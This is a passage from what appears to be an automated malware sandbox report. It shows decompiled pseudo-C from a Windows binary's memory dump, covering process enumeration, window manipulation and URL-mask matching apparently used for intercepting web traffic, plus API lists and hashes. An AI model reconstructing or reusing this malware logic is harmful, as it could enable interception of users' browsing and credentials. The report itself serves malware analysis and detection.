    					CloseHandle(_v20);
    					if(_v24 != _t71) {
    						continue;
    					}
    					break;
    				}
    				E004163A8(_v16);
    				return _v5;
    			}

    Instruction address range for the listing above: 0x00415ac6 to 0x00415c2d (the per-line address column was separated from the code during extraction).

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415AD5
    • Process32FirstW.KERNEL32(000001E6,?), ref: 00415AFE
    • OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 00415B59
    • CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 00415B76
    • GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 00415B89
    • CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 00415BF6
    • Process32NextW.KERNEL32(000001E6,0000022C), ref: 00415C02
    • CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 00415C13
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
    • String ID:
    • API String ID: 1981844004-0
    • Opcode ID: a8ae7269d01f89b9def8b6b83cfa10f47e06fdd957c47c0d0eb1a149c41586a0
    • Instruction ID: 35428b9b7fbbddad797699f5338242450ba2a5e6068569fffc04e0406f00be5b
    • Opcode Fuzzy Hash: a8ae7269d01f89b9def8b6b83cfa10f47e06fdd957c47c0d0eb1a149c41586a0
    • Instruction Fuzzy Hash: 0A417C30904519EFCB21EFA5DC849EEBBB5FF85304F1441AAE415A3260D735AAC2CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040CE91(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}

    0x0040ce9a
    0x0040cea1
    0x0040cea3
    0x0040cea5
    0x0040ceab
    0x0040cebe
    0x0040cec1
    0x0040cec4
    0x0040ced1
    0x0040ced9
    0x0040cee4
    0x0040cf03
    0x0040cf07
    0x0040cf0a
    0x0040cf28
    0x0040cf28
    0x0040cf2b
    0x0040cf4b
    0x00000000
    0x0040cf2d
    0x0040cf2d
    0x0040cf2d
    0x0040cf2e
    0x0040cf46
    0x0040cf30
    0x0040cf30
    0x0040cf30
    0x0040cf31
    0x0040cf3e
    0x00000000
    0x0040cf33
    0x0040cf33
    0x0040cf34
    0x00000000
    0x00000000
    0x0040cf34
    0x0040cf31
    0x0040cf2e
    0x0040cf0c
    0x0040cf0c
    0x0040cf23
    0x0040cf23
    0x00000000
    0x0040cf0e
    0x0040cf0f
    0x0040cf0f
    0x0040cf10
    0x00000000
    0x0040cf12
    0x0040cf13
    0x0040cf13
    0x0040cf14
    0x0040cf36
    0x0040cf36
    0x00000000
    0x0040cf16
    0x0040cf16
    0x0040cf16
    0x0040cf19
    0x0040cf41
    0x0040cf41
    0x0040cf1b
    0x0040cf1b
    0x0040cf1b
    0x0040cf1c
    0x0040cf39
    0x0040cf39
    0x0040cf1e
    0x0040cf1e
    0x0040cf1f
    0x0040cf4e
    0x0040cf4e
    0x0040cf4e
    0x0040cf1f
    0x0040cf1c
    0x0040cf19
    0x0040cf14
    0x0040cf10
    0x0040cf0c
    0x0040cee6
    0x0040cee6
    0x0040cee9
    0x0040ceef
    0x0040cef5
    0x0040cef8
    0x0040cefb
    0x0040cefe
    0x0040cefe
    0x0040cf55
    0x0040cf5d
    0x0040cf6f
    0x0040cf83
    0x0040cf83
    0x00000000
    0x0040cfa7
    0x0040cf5d
    0x0040cfb1

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040CEA5
    • ReleaseMutex.KERNEL32(?), ref: 0040CEC4
    • GetWindowRect.USER32 ref: 0040CED1
    • IsRectEmpty.USER32(?), ref: 0040CF55
    • GetWindowLongW.USER32(?,000000F0), ref: 0040CF64
    • GetParent.USER32(?), ref: 0040CF7A
    • MapWindowPoints.USER32 ref: 0040CF83
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040CFA7
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: c41954ec6d3e168b39ccf0af096429a80b4581b8a0f3b33277427a0f8b808706
    • Instruction ID: cbc74b3b929829f3c444a761e227ba3d0cca7254c115a46270ba0b8a2fa6f5e0
    • Opcode Fuzzy Hash: c41954ec6d3e168b39ccf0af096429a80b4581b8a0f3b33277427a0f8b808706
    • Instruction Fuzzy Hash: D641127190020BEFDB109F98C9896FEBBB5FB04350F10467AE615F22E0D7789940DB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E00414994(intOrPtr _a4) {
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v32;
    				char _v36;
    				char _v60;
    				char _v72;
    				signed int _v76;
    				char* _v80;
    				void* _v96;
    				intOrPtr _v148;
    				void* _v160;
    				char _v168;
    				char _v272;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t128;
    				intOrPtr* _t129;
    				char* _t130;
    				void* _t137;
    				void* _t140;
    				void* _t144;
    				void* _t152;
    				void* _t154;
    				char* _t156;
    				void* _t161;
    				void* _t163;
    				void* _t164;
    				void* _t167;
    				void* _t172;
    				intOrPtr _t174;
    				intOrPtr* _t176;
    				void* _t177;
    				void* _t182;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				signed int _t189;
    				void* _t194;
    				void* _t197;
    				void* _t198;
    				void* _t199;
    				int _t204;
    				void* _t207;
    				signed int _t210;
    				void* _t214;
    				signed int _t217;
    				signed int _t218;
    				void* _t219;
    				void* _t224;
    				char* _t227;
    				intOrPtr _t228;
    				char* _t233;
    				char* _t236;
    				intOrPtr _t238;
    				signed int _t239;
    				intOrPtr _t240;
    				void* _t244;
    				void* _t247;
    
    				_t217 = 0;
    				_v16 = 0;
    				_v9 = 0xff;
    				EnterCriticalSection(0x423124);
    				_t225 =  *0x423140;
    				if( *0x423140 == 0 ||  *0x42313c == 0) {
    					_t240 = _a4;
    				} else {
    					_t240 = _a4;
    					_t230 = 0;
    					if(E004140C9(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
    						_t210 = E00405AEB();
    						_v20 = _t210;
    						if(_t210 != 0) {
    							_t214 = E00414183(0, 4,  &_v20,  *0x42313c);
    							_push(_v20);
    							if(_t214 == 0) {
    								E004163A8();
    							}
    							E00405B56(_t225);
    						}
    						E004163A8( *0x42313c);
    						E004163A8( *0x423140);
    						 *0x42313c = _t217;
    						 *0x423140 = _t217;
    					}
    				}
    				LeaveCriticalSection(0x423124);
    				_t128 =  *((intOrPtr*)(_t240 + 0x40));
    				_t254 = _t128 - _t217;
    				if(_t128 == _t217) {
    					L38:
    					if((_v16 & 0x00000001) == 0) {
    						_t187 =  *((intOrPtr*)(_t240 + 0x44));
    						_t272 = _t187 - _t217;
    						if(_t187 != _t217 && E00414384(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
    							_v16 = _v16 | 0x00000001;
    						}
    					}
    					if( *(_t240 + 0x20) >= 0x21) {
    						_t182 = 0x10;
    						E0040F9FD(_t182,  &_v72);
    						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
    						if(E00416419( &_v72, _t238, 0x21) == 0) {
    							_t186 =  *((intOrPtr*)(_t238 + 0x21));
    							if(_t186 == 0x3b || _t186 == 0) {
    								_v16 = _v16 | 0x00000010;
    							}
    						}
    					}
    					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
    					_v24 = _t217;
    					if(_t129 == _t217 ||  *_t129 == _t217) {
    						L52:
    						_t130 =  *((intOrPtr*)(_t240 + 0x34));
    						__eflags = _t130 - _t217;
    						if(_t130 == _t217) {
    							goto L60;
    						}
    						__eflags =  *_t130;
    						if( *_t130 == 0) {
    							goto L60;
    						}
    						_t167 = 0x12;
    						E0040FA33(_t167,  &_v168);
    						_t172 = E00417116( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
    						_t247 = _t247 + 0xc;
    						goto L55;
    					} else {
    						_t176 =  *((intOrPtr*)(_t240 + 0x30));
    						if(_t176 == _t217 ||  *_t176 == _t217) {
    							goto L52;
    						} else {
    							_t177 = 0x11;
    							E0040FA33(_t177,  &_v272);
    							_push( *((intOrPtr*)(_a4 + 0x30)));
    							_t172 = E00417116( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
    							_t247 = _t247 + 0x10;
    							L55:
    							if(_t172 > _t217) {
    								_t174 = E00417757(_v24, _t172 + _t172);
    								if( *0x4230bc != _t174) {
    									_t64 =  &_v16;
    									 *_t64 = _v16 | 0x00000020;
    									__eflags =  *_t64;
    									 *0x4230bc = _t174;
    								} else {
    									E004163A8(_v24);
    									_v24 = _t217;
    								}
    							}
    							_t240 = _a4;
    							L60:
    							if(_v9 != 0xff) {
    								__eflags = _v9 - 1;
    								if(_v9 != 1) {
    									L67:
    									if((_v16 & 0x00000008) == 0) {
    										L93:
    										E004163A8(_v24);
    										_t218 = _v16;
    										if((_t218 & 0x00000001) == 0) {
    											if(E004143EC(_t230, _t240) != 0) {
    												_t218 = _t218 | 0x00000002;
    											}
    											if((_t218 & 0x00000010) != 0 && E004147A6(_t240, _t230) != 0) {
    												_t218 = _t218 | 0x00000004;
    											}
    										}
    										return _t218;
    									}
    									_t136 =  *(_t240 + 0x28);
    									_t219 = 0;
    									if( *(_t240 + 0x28) != 0) {
    										__eflags = _v16 & 0x00000010;
    										if((_v16 & 0x00000010) == 0) {
    											__eflags =  *(_t240 + 0x20);
    											if( *(_t240 + 0x20) != 0) {
    												L92:
    												_v16 = _v16 & 0xfffffff7;
    												goto L93;
    											}
    											_t233 =  &_v36;
    											_t137 = 0xc;
    											E0040F9FD(_t137, _t233);
    											_push(_t233);
    											_push(9);
    											L81:
    											_pop(_t140);
    											_v20 = E00416806(_t140);
    											L82:
    											if(_v20 == 0) {
    												goto L92;
    											}
    											E00405CFE( &_v32);
    											_t144 = E004165E8( *(_t240 + 0xc), 0,  *(_t240 + 8));
    											_t235 = _t144;
    											if(_t144 != 0) {
    												_t230 = 0x3c;
    												E0041645B( &_v160,  &_v160, 0, _t230);
    												_v160 = _t230;
    												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
    													_t152 = 0xa;
    													E0040FA33(_t152,  &_v272);
    													_t154 = 0xd;
    													E0040FA33(_t154,  &_v60);
    													_t227 =  *(_a4 + 0x10);
    													_t156 = 0x403240;
    													_t230 =  ==  ? 0x403240 : _v24;
    													_t244 =  ==  ? 0x403240 : _v32;
    													if(_t227 == 0) {
    														_t227 = "-";
    													}
    													if((_v16 & 0x00000001) != 0) {
    														_t156 =  &_v60;
    													}
    													_push(_v20);
    													_push(_t230);
    													_push(_t244);
    													_push(_t227);
    													_push(_t156);
    													_t161 = E0040592A(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
    													_t240 = _a4;
    													_t219 = _t161;
    												}
    												E004163A8(_t235);
    											}
    											E004163A8(_v32);
    											E004163A8(_v20);
    											if(_t219 != 0) {
    												goto L93;
    											} else {
    												goto L92;
    											}
    										}
    										_t230 = E00416806(_t136,  *((intOrPtr*)(_t240 + 0x24)));
    										_v20 = _t230;
    										__eflags = _t230;
    										if(_t230 == 0) {
    											goto L92;
    										}
    										_t163 = 0;
    										__eflags =  *(_t240 + 0x28);
    										if( *(_t240 + 0x28) <= 0) {
    											goto L82;
    										} else {
    											goto L73;
    										}
    										do {
    											L73:
    											_t228 =  *((intOrPtr*)(_t163 + _t230));
    											__eflags = _t228 - 0x26;
    											if(_t228 != 0x26) {
    												__eflags = _t228 - 0x2b;
    												if(_t228 == 0x2b) {
    													 *((char*)(_t163 + _t230)) = 0x20;
    												}
    											} else {
    												 *((char*)(_t163 + _t230)) = 0xa;
    											}
    											_t163 = _t163 + 1;
    											__eflags = _t163 -  *(_t240 + 0x28);
    										} while (_t163 <  *(_t240 + 0x28));
    										goto L82;
    									}
    									_t236 =  &_v36;
    									_t164 = 0xb;
    									E0040F9FD(_t164, _t236);
    									_push(_t236);
    									_push(7);
    									goto L81;
    								}
    								L66:
    								_v16 = _v16 | 0x00000008;
    								goto L67;
    							}
    							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
    								if((_v16 & 0x00000020) == 0) {
    									goto L67;
    								}
    							}
    							goto L66;
    						}
    					}
    				}
    				_t189 = E0041BF16( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
    				_t225 = _v32;
    				_v20 = _t189;
    				if(E0041723A(_t189, _v32) == 0) {
    					L37:
    					E004163A8(_v20);
    					_t217 = 0;
    					goto L38;
    				} else {
    					_t239 = _v20;
    					do {
    						_t225 = _t239 + 1;
    						if( *_t225 == 0) {
    							goto L36;
    						}
    						_t194 =  *_t239;
    						if(_t194 == 0x21) {
    							L22:
    							_t239 = _t225;
    							L23:
    							_t230 = 0;
    							_t225 = _t239;
    							if(E004140C9(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
    								goto L36;
    							}
    							_t197 = _t224;
    							if(_t197 == 0) {
    								_v9 = 0;
    								L35:
    								if(_t224 != 2) {
    									goto L37;
    								}
    								goto L36;
    							}
    							_t198 = _t197 - 1;
    							if(_t198 == 0) {
    								L30:
    								_v9 = 1;
    								goto L35;
    							}
    							_t199 = _t198 - 1;
    							if(_t199 == 0) {
    								_t230 = 0x3c;
    								E0041645B( &_v96,  &_v96, 0, 0);
    								_v80 =  &_v536;
    								_v96 = 0;
    								_v76 = 0x103;
    								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
    								__eflags = _t204 - 1;
    								if(_t204 == 1) {
    									__eflags = _v76;
    									if(_v76 > 0) {
    										E00405CB8( &_v536);
    									}
    								}
    								goto L35;
    							}
    							_t207 = _t199 - 1;
    							if(_t207 == 0 || _t207 == 1) {
    								_v16 = _v16 | 0x00000001;
    								goto L30;
    							} else {
    								goto L35;
    							}
    						}
    						if(_t194 == 0x2d) {
    							goto L22;
    						}
    						if(_t194 == 0x40) {
    							goto L22;
    						}
    						if(_t194 == 0x5e) {
    							_t224 = 4;
    							goto L22;
    						} else {
    							_t224 = 0;
    							goto L23;
    						}
    						L36:
    						_t239 = E00417278(_t239, 1);
    					} while (_t239 != 0);
    					goto L37;
    				}
    			}


    0x004149a5
    0x004149a8
    0x004149ab
    0x004149af
    0x004149b5
    0x004149bd
    0x00414a2e
    0x004149c7
    0x004149c7
    0x004149cd
    0x004149d9
    0x004149db
    0x004149e0
    0x004149e5
    0x004149f3
    0x004149f8
    0x004149fd
    0x004149ff
    0x00414a04
    0x00414a05
    0x00414a05
    0x00414a10
    0x00414a1b
    0x00414a20
    0x00414a26
    0x00414a26
    0x004149d9
    0x00414a32
    0x00414a38
    0x00414a3b
    0x00414a3d
    0x00414b42
    0x00414b46
    0x00414b48
    0x00414b4b
    0x00414b4d
    0x00414b62
    0x00414b62
    0x00414b4d
    0x00414b6a
    0x00414b71
    0x00414b72
    0x00414b77
    0x00414b88
    0x00414b8a
    0x00414b8f
    0x00414b95
    0x00414b95
    0x00414b8f
    0x00414b88
    0x00414b99
    0x00414b9c
    0x00414ba1
    0x00414bdc
    0x00414bdc
    0x00414bdf
    0x00414be1
    0x00000000
    0x00000000
    0x00414be3
    0x00414be6
    0x00000000
    0x00000000
    0x00414bf0
    0x00414bf1
    0x00414c03
    0x00414c08
    0x00000000
    0x00414ba8
    0x00414ba8
    0x00414bad
    0x00000000
    0x00414bb4
    0x00414bbc
    0x00414bbd
    0x00414bc5
    0x00414bd2
    0x00414bd7
    0x00414c0b
    0x00414c0d
    0x00414c15
    0x00414c20
    0x00414c2f
    0x00414c2f
    0x00414c2f
    0x00414c33
    0x00414c22
    0x00414c25
    0x00414c2a
    0x00414c2a
    0x00414c20
    0x00414c38
    0x00414c3b
    0x00414c3f
    0x00414c54
    0x00414c58
    0x00414c5e
    0x00414c62
    0x00414dd5
    0x00414dd8
    0x00414ddd
    0x00414de3
    0x00414ded
    0x00414def
    0x00414def
    0x00414df5
    0x00414e02
    0x00414e02
    0x00414df5
    0x00414e0b
    0x00414e0b
    0x00414c68
    0x00414c6b
    0x00414c6f
    0x00414c83
    0x00414c87
    0x00414cc4
    0x00414cc8
    0x00414dd1
    0x00414dd1
    0x00000000
    0x00414dd1
    0x00414cd0
    0x00414cd3
    0x00414cd4
    0x00414cdb
    0x00414cdc
    0x00414cde
    0x00414cde
    0x00414ce4
    0x00414ce7
    0x00414ceb
    0x00000000
    0x00000000
    0x00414cf4
    0x00414d01
    0x00414d06
    0x00414d0a
    0x00414d12
    0x00414d1d
    0x00414d2e
    0x00414d40
    0x00414d4a
    0x00414d4b
    0x00414d55
    0x00414d56
    0x00414d64
    0x00414d69
    0x00414d6e
    0x00414d73
    0x00414d78
    0x00414d7a
    0x00414d7a
    0x00414d83
    0x00414d85
    0x00414d85
    0x00414d88
    0x00414d8b
    0x00414d8c
    0x00414d8d
    0x00414d8e
    0x00414daa
    0x00414daf
    0x00414db5
    0x00414db5
    0x00414db8
    0x00414db8
    0x00414dc0
    0x00414dc8
    0x00414dcf
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00414dcf
    0x00414c91
    0x00414c93
    0x00414c96
    0x00414c98
    0x00000000
    0x00000000
    0x00414c9e
    0x00414ca0
    0x00414ca3
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00414ca5
    0x00414ca5
    0x00414ca5
    0x00414ca8
    0x00414cab
    0x00414cb3
    0x00414cb6
    0x00414cb8
    0x00414cb8
    0x00414cad
    0x00414cad
    0x00414cad
    0x00414cbc
    0x00414cbd
    0x00414cbd
    0x00000000
    0x00414cc2
    0x00414c73
    0x00414c76
    0x00414c77
    0x00414c7e
    0x00414c7f
    0x00000000
    0x00414c7f
    0x00414c5a
    0x00414c5a
    0x00000000
    0x00414c5a
    0x00414c45
    0x00414c50
    0x00000000
    0x00000000
    0x00414c52
    0x00000000
    0x00414c45
    0x00414bad
    0x00414ba1
    0x00414a51
    0x00414a56
    0x00414a59
    0x00414a63
    0x00414b38
    0x00414b3b
    0x00414b40
    0x00000000
    0x00414a69
    0x00414a69
    0x00414a6c
    0x00414a6c
    0x00414a72
    0x00000000
    0x00000000
    0x00414a78
    0x00414a7c
    0x00414a9c
    0x00414a9c
    0x00414a9e
    0x00414aa1
    0x00414aa6
    0x00414aaf
    0x00000000
    0x00000000
    0x00414ab4
    0x00414ab7
    0x00414b1c
    0x00414b20
    0x00414b23
    0x00000000
    0x00000000
    0x00000000
    0x00414b23
    0x00414ab9
    0x00414aba
    0x00414ac9
    0x00414ac9
    0x00000000
    0x00414ac9
    0x00414abc
    0x00414abd
    0x00414ad1
    0x00414ad9
    0x00414ae4
    0x00414af0
    0x00414af6
    0x00414afd
    0x00414b03
    0x00414b06
    0x00414b08
    0x00414b0c
    0x00414b15
    0x00414b15
    0x00414b0c
    0x00000000
    0x00414b06
    0x00414abf
    0x00414ac0
    0x00414ac5
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00414ac0
    0x00414a80
    0x00000000
    0x00414a96
    0x00414a84
    0x00000000
    0x00414a92
    0x00414a88
    0x00414a8e
    0x00000000
    0x00414a8a
    0x00414a8a
    0x00000000
    0x00414a8a
    0x00414b25
    0x00414b2e
    0x00414b30
    0x00000000
    0x00414a6c

    APIs
    • EnterCriticalSection.KERNEL32(00423124,?,?,?), ref: 004149AF
    • LeaveCriticalSection.KERNEL32(00423124,?,?,?), ref: 00414A32
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 00414AFD
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 00414D37
      • Part of subcall function 00405AEB: CreateMutexW.KERNEL32(00422BD0,00000000,00422838,00423124,000000FF,?,004149E0,?,?,?,?,?), ref: 00405B13
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
    • String ID: $$1B
    • API String ID: 4018265435-1232611650
    • Opcode ID: 47f2ec4dff7a6501bf300a645975428061cf95cea47dde01b357e172c23a3690
    • Instruction ID: 4fa88fcf790a8b0c1230a9e793b23cdca11eeef32dab8c0a9c75a7df79a22d0e
    • Opcode Fuzzy Hash: 47f2ec4dff7a6501bf300a645975428061cf95cea47dde01b357e172c23a3690
    • Instruction Fuzzy Hash: 76D1E031A00209AEDF209FA1C841BEFBBB5AF85304F05446BE951A7291D77CE9C2CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E00405282(WCHAR* __ecx, signed char* _a4) {
    				char _v268;
    				char _v691;
    				signed short _v792;
    				signed short _v864;
    				char _v1060;
    				short _v1580;
    				short _v1584;
    				intOrPtr _v1588;
    				signed char* _v1592;
    				signed int _v1596;
    				char* _v1600;
    				void* _v1604;
    				intOrPtr _v1608;
    				intOrPtr _v1612;
    				char _v1616;
    				intOrPtr _v1620;
    				signed int _v1624;
    				signed int _v1628;
    				void* _v1629;
    				signed int _v1632;
    				void* __ebx;
    				void* __esi;
    				signed int _t60;
    				signed int _t69;
    				signed int _t71;
    				signed int _t72;
    				signed int _t80;
    				signed int _t83;
    				long _t84;
    				long _t85;
    				signed int _t89;
    				signed int _t101;
    				signed int _t108;
    				signed int _t110;
    				WCHAR* _t123;
    				signed char _t125;
    				signed char* _t131;
    				signed int _t134;
    				void* _t136;
    				void* _t140;
    				signed int _t141;
    
    				_t128 = __ecx;
    				_t131 = _a4;
    				_t60 = E0040EDBB(__ecx,  *_t131, (0 |  *_t131 != 0x00000000) + 0x78d0c214, 2);
    				_v1628 = _t60;
    				if(_t60 != 0) {
    					_v1604 =  *0x42305c;
    					_v1600 =  &_v268;
    					_v1612 = E004050DE;
    					_v1608 = E0040521A;
    					_v1592 = _t131;
    					E0040F05A( &_v1060);
    					E004163E4( &_v268,  &_v691, 0x102);
    					_t69 =  *_t131 & 0x000000ff;
    					__eflags = _t69;
    					if(_t69 == 0) {
    						_t71 = _v792 >> 0x10;
    						__eflags = _t71;
    						_v1628 = _t71;
    						_t72 = _v792 & 0x0000ffff;
    						goto L7;
    					} else {
    						__eflags = _t69 == 1;
    						if(_t69 == 1) {
    							_v1628 = _v864 >> 0x10;
    							_t72 = _v864 & 0x0000ffff;
    							L7:
    							_v1624 = _t72;
    						}
    					}
    					_v1628 = _v1628 * 0xea60;
    					_v1624 = _v1624 * 0xea60;
    					E0041645B( &_v1060,  &_v1060, 0, 0x318);
    					_v1592 = 0;
    					_t80 = E0040EEE1();
    					__eflags = _t80;
    					if(_t80 != 0) {
    						do {
    							__eflags =  *_t131;
    							_v1629 = 1;
    							if( *_t131 != 0) {
    								L24:
    								_t83 = E00415F3A();
    								_t138 = _t83;
    								__eflags = _t83;
    								if(__eflags == 0) {
    									goto L29;
    								} else {
    									_v1628 = E0041BF16(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
    									E004163A8(_t138);
    									__eflags = _v1632;
    									if(_v1632 == 0) {
    										_t131 = _a4;
    										goto L33;
    									} else {
    										_v1596 = _v1596 & 0;
    										_t108 = E00404EA2(_t128, _t129,  &_v1596, 1);
    										_t131 = _a4;
    										__eflags = _t108;
    										if(_t108 == 0) {
    											L33:
    											_t125 = _v1629;
    										} else {
    											_t131[8] = _t131[8] | 0xffffffff;
    											_t110 = E0040569F( &_v1616);
    											__eflags = _t110;
    											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
    											E0041C343( &(_t131[8]));
    											E004163A8(_v1596);
    										}
    									}
    									E004163A8(_v1616);
    									__eflags = _t125 - 2;
    									if(_t125 != 2) {
    										__eflags = _t125;
    										if(_t125 != 0) {
    											goto L29;
    										} else {
    											_t84 = _v1628;
    										}
    									} else {
    										_t84 = _v1624;
    									}
    								}
    							} else {
    								asm("sbb ebx, ebx");
    								E00404D61( !( ~(_v1580 & 0x0000ffff)) &  &_v1580, _t128, 0);
    								_t123 =  &(_t131[0x122]);
    								_t89 = GetFileAttributesW( &_v1584);
    								__eflags = _t89 - 0xffffffff;
    								if(_t89 == 0xffffffff) {
    									_t89 = GetFileAttributesW(0x4223a8);
    									__eflags = _t89 - 0xffffffff;
    									if(_t89 == 0xffffffff) {
    										goto L29;
    									} else {
    										_t128 = 0x4223a8;
    										goto L14;
    									}
    								} else {
    									_t128 =  &_v1580;
    									L14:
    									_t129 = _t123;
    									E00416749(_t89 | 0xffffffff, _t128, _t129);
    									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
    									__eflags = _t140 - 0xffffffff;
    									if(_t140 == 0xffffffff) {
    										L28:
    										E0041B705(_t123);
    										goto L29;
    									} else {
    										_v1592 = E0041B6DE(_t128, _t140);
    										_t134 = _t129;
    										CloseHandle(_t140);
    										__eflags = _v1592 - 0xffffffff;
    										if(_v1592 != 0xffffffff) {
    											L17:
    											__eflags = _t134;
    											if(__eflags > 0) {
    												goto L28;
    											} else {
    												if(__eflags < 0) {
    													L20:
    													__eflags = lstrcmpiW(_t123,  &_v1580);
    													if(__eflags == 0) {
    														goto L24;
    													} else {
    														_t141 = E0040EDBB(_t128, __eflags, 0x8793aef2, 2);
    														__eflags = _t141;
    														if(_t141 == 0) {
    															L29:
    															_t131 = _a4;
    															_t84 = 0x7530;
    														} else {
